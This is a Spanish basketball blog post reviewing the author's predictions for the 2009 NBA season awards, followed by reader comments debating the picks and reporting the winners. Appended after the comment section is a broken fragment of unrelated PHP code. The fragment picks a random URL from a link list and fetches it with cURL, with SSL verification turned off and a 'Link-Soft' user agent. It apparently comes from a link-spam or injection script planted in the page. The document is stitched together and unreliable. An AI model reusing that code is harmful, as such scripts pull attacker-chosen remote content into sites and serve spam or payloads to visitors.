Premios TJNBA 2009

20 de April de 2009 por Viva_Dirk

Al empezar la temporada nos lanzábamos a la piscina e intentábamos pronosticar quién se haría con cada uno de los premios de la NBA. Una vez finalizada la liga regular llega el momento de echarles un vistazo para ver si andábamos muy desencaminados.

MVP

Lebron James fue nuestra apuesta y sin duda hemos acertado ya que ahora mismo nadie se plantea que alguien llegue siquiera a peleárselo. Un espectacular mes de Dwyane Wade creo una pequeñísima duda que fue rápidamente disipada. Los Cavs que lidera con mano de hierro han terminado con el mejor balance de la liga y a un partido de igualar el record de los Celtics de partidos ganados en su feudo. 66-16 es una pasada para esta plantilla. Los números de James, 28.4 puntos, 7.6 rebotes, 7.2 asistencias, 1.7 robos, 1.1 tapones y un 49% en tiros de campo, son, simplemente, incontestables.

ROY

A finales de octubre nuestro candidato para el rookie del año era el alero de los Heat,  Michael Beasley, casi empatado con el pívot de los Blazers, Greg Oden. Precisamente dos de las decepciones… Vergüenza debería darnos. Cierto es que en tercer lugar colocábamos al que ahora mismo parece merecedor del premio, Derrick Rose, aunque tampoco nos las podemos dar de adivinos. El Nº1 del pasado draft ha llevado a los Bulls a play-offs y ha hecho una temporada completísima. Disputando 37 minutos por encuentro durante 81 partidos sus números han sido de 16.8 puntos, 6.3 asistencias y 3.9 rebotes con un 47.5% en tiros de campo y lo más importante, se ha convertido en el líder y alma del equipo. En alguna quinielas seguro que  aparece OJ Mayo porque en este premio no suele contar tanto el récord del equipo. En global, está generación deja unas sensaciones brutales. No diré más nombres para no dejarme injustamente a ninguno.

COY

Apostamos por Phil Jackson y si no llega a lesionarse Bynum, teníamos toda la pinta de  acertar pero lo cierto es que ahora mismo el maestre Zen no aparece como candidato. El que sí aparece es Nate McMillan que ha dejado a Portland con el 2º mejor récord del Oeste solo superado por los Lakers e igualado con Nuggets y Spurs. Mike Brown es otro firme candidato a llevarse el premio pero todos los focos que apuntan a Lebron podrían perjudicarle. Me decanto por el trabajo que ha hecho Rick Adelman al frente de los Rockets consiguiendo que sin T-Mac jueguen mejor que con él.

MIP

Dabamos un montón de nombres al principio de esta campaña pero en el que más confianza depositamos fue Devin Harris. No nos faltaba razón porque el base de los Nets ha mejorado en 6 puntos su promedio anotador (de 15.4 puntos a 21.3 por noche). Llegó al All-Star con su equipo en play-offs y aunque finalmente se hayan quedado fuera es uno de los máximos candidatos ahora mismo. Sin embargo muchos apuestan  por Nene Hilario, pieza clave en estos Nuggets, que se ha recuperado casi milagrosamente de un tumor y que ha vuelto casi en mejores condicines en las que marchó. Otros nombres que suenan son los  de Paul Millsap, enorme durante la lesión de Boozer, o Kevin Durant,  aunque no es muy normal que un sophomore se alce con este premio. En todo caso, mi favorito es Danny Granger que exactamente en los mismos minutos que el año pasado anota 6 puntos más, manteniendo un gran porcentaje en el tiro de media distancia, colocando 1.5 tapones por noche y lo que es más importante, pasando de jugador con gran potencial a estrella incuestionable de la liga.

Mejor Defensor

Aquí fuímos a lo seguro y nos equivocamos, porque Kevin Garnett no ha tenido la salud suficiente para poder renovar su título. Casi tan claro como el MVP, el premio al mejor defensor se lo damos a Dwight Howard, que mas allá de sus números que incluyen 3 tapones por noche, supone tal intimidación que los Magic pueden jugar con Rashard Lewis de 4. El segundo en discordia parece ser Rajon Rondo, uno de lo mejores (sino el mejor) defensores exteriores de la liga e incluso Lebron aparece en un buen número de predicciones.

Mejor sexto hombre

Cualquier jugador que no fuese Lamar Odom o Manu Ginobili nos parecía poco o muy poco probable pero el de los Spurs se ha perdido demasiados partidos y del de los Lakers se esperaba algo más, aunque éste último sin duda aparecerá en los puestos altos del premio. La pelea parece estar entre Jason Terry y JR Smith. Terry ha sido sin duda mucho más regular compartiendo protagonismo con Nowitzki en los Mavs durante la ausencia de Howard y superando en importancia a Kidd. Smith es el talento puro, capaz de meter 11 triples o de ser un problema en el vestuario. Esta temporada ha brillado mucho más su mejor versión y su aportación también ha sido clave para los Nuggets. Como hay que decantarse por uno… que sea Jason Terry.

Ahora vamos con 2 premios de cosecha propia, que llevamos todo el año otorgándolos en las crónicas:

La Mayor Decepción

Hay dos jugadores que incluso recibieron un voto como candidatos al MVP en nuestras predicciones. Nada  más y nada menos que Elton Brand y Baron Davis. El primero se lesionó de gravedad en febrero para todo el año pero los Sixers, lejos de resentirse, han funcionado mejor sin él. Tan simple como que la marca sin el ala-pívot es de 28-25 y con él de 13-16. Los números cantan. El caso de Davis ha sido aún más sangrante y casi de expediente-X ya que ni cuando ha estado sano ha rendido a su nivel. Premio para el angelino.

MEV

El premio al mayor esfuerzo en vano está realmente muy disputado pero sin duda los dos máximos candidatos son Danny Granger y Kevin Durant, ambos con más de 25 puntos por partido. Se lo doy a Durant porque durante un momento de la temporada consiguió que los Thunder( sí, sí, los Thunder) fuesen un equipo peligroso. Es obligatorio mencionar también a los Wizards Antawn Jamison y Caron Butler y al escolta de los Kings, Kevin Martin.

Comenta

14 comentarios a esta entrada

  1. Dantley2 dice:
    #1

    Pues a mí me gustan todas las propuestas. En la de entrenador también apuesto por Adelman, impresionante lo que ha hecho con Yao Ming y el resto de los jugadores que en muchos de los equipos de playoffs no serían titulares. Quizá en el más mejorado habrá muchas más dudas, aunque debería estar entre Nene y Millsap.

      Citar

  2. El blog de la ÑBA dice:
    #2

    Para mí Adelman es el mejor entrenador de la Liga, todo depende del peso específico que le den a Mike Brown en la grandísima temporada de Cleveland…

      Citar

  3. El blog de la ÑBA dice:
    #3

    Como temía se lo ha llevado Mr. Brown…

    Congratulations!

      Citar

  4. Viva_Dirk dice:
    #4

    Para mi si se lo lleva Hilario es injustísimo porque no es un jugador que halla mejorado mucho, sino que ha pasado de no jugar a jugar 33 minutos.

    Lo de Brown me sorprende bastante la verdad.

      Citar

  5. kantonyo dice:
    #5

    Ricky Rubio confirma que se va a presentar al Draft.

    Yo creo que le vendria de lujo recalar en Oklahoma.

    RUBIO – WESTBROOK – DURANT y GREEN

    Solo faltaria un buen pivot para ser uno de los equipos que mejor futuro en la liga.

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    Mike Dunleavy no entra en las quinielas?

      Citar

  7. MagicJohnson32 dice:
    #7

    ¿Entonces el mérito de Adelman es no saber sacar partido a una plantilla con McGrady y sí a una plantilla sin McGrady? Para eso le damos el premio de CoY a la espalda y las rodillas de McGrady ¿no?

    Por lo demás me parecen muy buenas las propuestas. Lo del MIP, tendría en consideración de Millsap, porque el resto de los nombrados tenían toda la pinta de estrellas en ciernes, pero lo de éste ha sido una gran sorpresa.

      Citar

  8. Gallis dice:
    #8

    Bueno, pues aunque no era mi candidato, realmente no se puede reprochar la elección de Brown como CoY…eso sí, personalmente se lo daría a McMillan. Lo que ha hecho con Portland es sensacional. Yo esperaba mucho de este equipo y este entrenador, pero no tanto esta temporada.

      Citar

  9. TheDeerHunter dice:
    #9

    Yo creo que la elección de Brown es absolutamente justa… el mejor resultado sin la mejor plantilla.

    La clave es esa, cómo ha logrado hacer comulgar todo el grupo a una individualidad tan absorvente como la de Lebron.
    No me gustaría que cayéramos en el error de incendiar todo lo que está alrededor de Lebron sólo porque éste sea tan bueno. Supongo que no le negaríaiamos a Phill Jackson el premio por tener a Kobe en el equipo…. pero claro el cartel que tiene Phill….

      Citar

  10. Viva_Dirk dice:
    #10

    Kantonyo yo creo que ese equipo necesita dos tios interiores, es muy dificil ser un equip fuerte en el Oeste sin una pareja de hombres grandes, Green es polivalente y se le ve mas cómodo de 4, ideal para 6º hombre.

    Yo prefiero que caiga en Sacramento, aunque la verdad es que lo importante es que confien en el desde el primer minuto.

      Citar

  11. TheDeerHunter dice:
    #11

    Supermán Howard el mejor defensor más joven de la historia. Confirmado.
    ibamos a lo seguro

      Citar

  12. TheDeerHunter dice:
    #12

    Rose ROY, confirmado

      Citar

  13. Txusma dice:
    #13

    Este Deer, adelantandonos las noticias…

      Citar

  14. TheDeerHunter dice:
    #14

    Pues ale, notición… Terry 6º hombre
    vaya premios tan impredecibles

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>